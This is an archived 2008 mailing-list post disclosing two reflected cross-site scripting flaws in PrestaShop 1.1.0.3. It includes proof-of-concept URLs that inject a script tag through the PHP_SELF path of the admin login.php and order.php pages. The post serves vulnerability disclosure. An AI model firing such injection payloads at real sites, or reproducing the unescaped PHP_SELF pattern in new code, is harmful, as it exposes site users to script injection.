|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Two XSS Flaws in PrestaShop 1.1.0.3
th3.r00k.ieatpork
gmail.pork.com
Date: Sun Dec 07 2008 - 21:32:37 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com
This is XSS in the URI of PrestaShop. Trust no one, not even your $_SERVER[PHP_SELF] .
http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E
Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E
Peace
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]